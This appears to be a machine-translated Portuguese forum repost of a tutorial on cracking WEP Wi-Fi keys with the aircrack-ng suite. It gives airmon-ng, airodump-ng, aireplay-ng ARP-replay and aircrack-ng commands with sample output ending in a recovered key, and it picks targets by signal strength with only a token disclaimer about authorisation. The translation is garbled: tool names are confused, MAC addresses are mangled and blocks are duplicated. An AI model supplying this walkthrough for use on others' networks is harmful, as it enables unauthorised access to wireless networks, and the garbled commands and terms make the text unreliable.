Linux experiência CMD
Backtrack 4 R2 ou Ubuntu 7.10 + Drivers remendado WiFi + Aircrack-ng
senso comum
Backtrack 4 R2 ou Ubuntu 7.10 + Drivers remendado WiFi + Aircrack-ng
senso comum
As informações contidas neste tutorial é para fins educacionais e informativos, usá-lo em seu próprio risco. Soldierx.com, seus membros, a tripulação e afiliadas não pode ser responsabilizada pelo uso indevido dessas informações.
Criptografia WEP tem sido aclamado como um dos métodos menos segura de garantir um ponto de acesso wireless na história do WiFi desde standards de encriptação wireless começou a ser desenvolvido. A principal razão para isto é que fragmentos da chave são enviadas entre um computador cliente eo ponto de acesso em vetores de inicialização de 32 bits comumente referido como o ICV. Estatisticamente tem sido demonstrado que um certo volume de estes têm criptografia fraca e são vulneráveis à análise de pacotes. O número de pacotes necessários para quebrar uma chave de ponto de acesso pode variar de 2-500 para 64 e criptografia de 128 bits respectivamente.
*** NOTA ***
** Este tutorial irá cobrir uma rachadura WEP básica
** Não é de forma alguma exaustiva e é destinado a
** A saltar fora do ponto, a partir daqui que eu mandar você para o Google
** O lugar onde eu tenho a minha primeira informação.
**********
*** Todos os comandos listados neste tutorial são BING RUN partir da conta root na máquina, SE VOCÊ NÃO ESTÁ FUNCIONANDO BACKTRACK OU VOCÊ BUILT SEU PRÓPRIO SISTEMA Você precisa fazer login como root ou sudo CADA COMANDO***
O primeiro passo para tentar qualquer cracker em um ponto de acesso WiFi é escolher um alvo. Isto pode ser conseguido através da execução airmon-ng para listar todas e quaisquer adaptadores de rede disponíveis.
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destruído)
Então você quer tipo airodump-ng start (nome do adaptador: ath0, wlan0, wlan1, etc) que isso faz é colocá-lo adaptador sem fio em modo promíscuo ou monitor que permite que ele aceite todo o tráfego e, basicamente, pegar pacotes ARP e tal de fora do ar, ele também permite que tha adaptador para fazer o que é chamado de injeção de pacote, basicamente tiro pacotes para a rede para obter uma resposta do ponto de acesso. O próximo comando para executar é airodump-ng (nome do adaptador: mon0, mon1, eth0, etc) isso vai listar todos os pontos de acesso disponíveis e permite que você escolha uma. você vai querer pegar um com o melhor sinal. A maneira de verificar o que é o melhor sinal é olhar para a coluna pwr enquanto o programa está sendo executado. um sinal forte será um baixo número precedido por um traço (-), como -56 ou -86. O primeiro exemplo seria o mais forte como eu acredito que a força é medida em dBm-ou a relação potência em decibéis (dB) da potência medida referenciada a um miliwatt. quanto menor o número, sendo mais forte como você obtém mais para uma saída positiva do poder.
CH 9] [decorrido: 8 minutos] [2007/03/21 19:25
BSSID PWR Beacons RXQ # Dados # / s CH MB ENC CIPHER AUTH ESSID
00:14:6 C: 7E: 40:80 42 100 5240 1783 07 338 9 54 WEP WEP teddy
BSSID STATION PWR Perdido Sondas Pacotes
00:14:6 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782
BSSID PWR Beacons RXQ # Dados # / s CH MB ENC CIPHER AUTH ESSID
00:14:6 C: 7E: 40:80 42 100 5240 1783 07 338 9 54 WEP WEP teddy
BSSID STATION PWR Perdido Sondas Pacotes
00:14:6 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782
Depois de ter seleccionado a sua meta, anote o BSSID, Channel, ea quantidade de dados que recebe. Outro bom indicador de uma boa accesspoint de crack seria uma quantidade razoável de dados recebidos (80-120 sem injeção, pode ser mais). Você, então, executar o comando airodump-ng-w arquivo - canal (de destino) - bssid (bssid ou o endereço MAC de destino) (interface para capturar em, mon0, eth0, seja qual for airmon dá-lhe como a interface de modo monitor tipicamente mon0)
Exemplo:
airodump-ng-w saída - canal 9 - C bssid 00:14:06: 7E: 40:80 ath0
18:18:20 Envio de solicitação de autenticação
18:18:20 autenticação bem-sucedida
18:18:20 Enviando Pedido Associação
18:18:20 Associação :-) sucesso
18:18:20 autenticação bem-sucedida
18:18:20 Enviando Pedido Associação
18:18:20 Associação :-) sucesso
Exemplo:
aireplay-ng -3-b 00:14:6 C: 7E: 40:80 ath0
Salvar requisições ARP em replay_arp-0321-191525.cap
Você também deve começar airodump-ng para capturar respostas.
Leia 629.399 pacotes (tem 316.283 pedidos ARP), enviou 210.955 pacotes ...
Você também deve começar airodump-ng para capturar respostas.
Leia 629.399 pacotes (tem 316.283 pedidos ARP), enviou 210.955 pacotes ...
abrir outra janela console, um terceiro, e entrar Aircrack-ng e filename.cap aricrack tentará com uma rachadura que você capturou, e se não for bem sucedido vai monitorar a quantidade dos dados que você recebeu e continuar tentando quebrar a chave em intervalos regulares. uma vez que o crack tem sucedido você vai conhecê-lo por uma tela que tem o seguinte:
Aircrack-ng 0,9
[00:03:06] Testado 674.449 chaves (tenho 96.610 IVs)
KB byte de profundidade (votação)
0 0 / 9 12 (15) F9 (15) 47 (12) F7 (12) FE 1B (12) (5) 77 (5) A5 (3) F6 (3) 03 (0)
1 0 / 8 34 (61) E8 (27) E0 (24) 06 (18) 3B (16) 4E (15) E1 (15) 2D (13) 89 (12) E4 (12)
2 0 / 2 56 (87) A6 (63) 15 (17) 02 (15) 6B (15) E0 (15) AB (13) 0E (10) 17 (10) 27 (10)
3 05/01 78 (43) 1A (20) 9B (20) 4B (17) 4A (16) 2B (15) 4D (15) 58 (15) 6A (15) 7C (15)
KEY FOUND! [12:34:56:78:90]
Probabilidade: 100%
[00:03:06] Testado 674.449 chaves (tenho 96.610 IVs)
KB byte de profundidade (votação)
0 0 / 9 12 (15) F9 (15) 47 (12) F7 (12) FE 1B (12) (5) 77 (5) A5 (3) F6 (3) 03 (0)
1 0 / 8 34 (61) E8 (27) E0 (24) 06 (18) 3B (16) 4E (15) E1 (15) 2D (13) 89 (12) E4 (12)
2 0 / 2 56 (87) A6 (63) 15 (17) 02 (15) 6B (15) E0 (15) AB (13) 0E (10) 17 (10) 27 (10)
3 05/01 78 (43) 1A (20) 9B (20) 4B (17) 4A (16) 2B (15) 4D (15) 58 (15) 6A (15) 7C (15)
KEY FOUND! [12:34:56:78:90]
Probabilidade: 100%
Isso é tudo o que é realmente necessário saber para quebrar um ponto de acesso WEP criptografada.
Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment